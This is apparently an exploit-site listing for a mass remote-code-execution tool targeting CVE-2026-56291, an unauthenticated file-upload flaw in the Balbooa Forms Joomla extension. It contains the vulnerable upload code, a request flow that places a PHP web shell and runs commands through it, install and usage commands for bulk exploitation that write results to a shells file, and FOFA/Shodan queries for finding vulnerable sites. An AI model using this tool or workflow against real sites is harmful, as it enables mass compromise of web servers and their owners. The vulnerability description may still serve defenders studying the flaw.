Share
## https://sploitus.com/exploit?id=F8A753B9-90EC-54D0-AC19-CAD8EE292E6C
CVE-2026-56291 โ€” Balbooa Forms Joomla Mass RCE Exploit
Pre-Auth form.uploadAttachmentFile โ†’ No CSRF โ†’ PHP Upload

---

## Overview

**CVE-2026-56291** is a critical (CVSS 9.8) unauthenticated arbitrary file upload vulnerability in the **Balbooa Forms** (com_baforms) Joomla extension ( **CISA KEV:** Added July 10, 2026 โ€” active exploitation confirmed.

---

## Vulnerability Mechanism

### Root Cause

```php
// FormModel::uploadAttachmentFile (frontend/models/forms/FormModel.php ~L122)
// No Session::checkToken(), no permission check, no extension whitelist
$fileName = $name . '.' . $ext;  // attacker's extension used directly
$filePath = JPATH_ROOT . '/images/baforms/uploads/form-' . $formId . '/' . $fileName;
move_uploaded_file($tmpFile, $filePath);
```

### Attack Flow

```
POST /index.php?option=com_baforms&task=form.uploadAttachmentFile&form_id=1&format=json
  file = shell.php (multipart)
โ†’ Saved to images/baforms/uploads/form-1/shell.php
โ†’ https://target.com/images/baforms/uploads/form-1/shell.php?c=id
โ†’ RCE
```

---

## Installation

```bash
git clone https://github.com/shinthink/CVE-2026-56291.git
cd CVE-2026-56291
pip install -r requirements.txt
```

## Usage

```bash
python cve_2026_56291.py -t target.com
python cve_2026_56291.py -f targets.txt -o shells.txt
python cve_2026_56291.py -t target.com --debug
python cve_2026_56291.py -t target.com --no-cleanup
```

---

## FOFA / Shodan

```
FOFA:   body="com_baforms"
Shodan: http.html:"baforms"
```

---

## References

| Resource | Link |
|---|---|
| CISA KEV | [cisa.gov/known-exploited-vulnerabilities](https://www.cisa.gov/known-exploited-vulnerabilities-catalog) |
| Fix Details | [mysites.guru](https://mysites.guru/blog/balbooa-forms-unauthenticated-file-upload-flaw/) |
| Researcher | Phil Taylor |

---


  Not affiliated with Balbooa.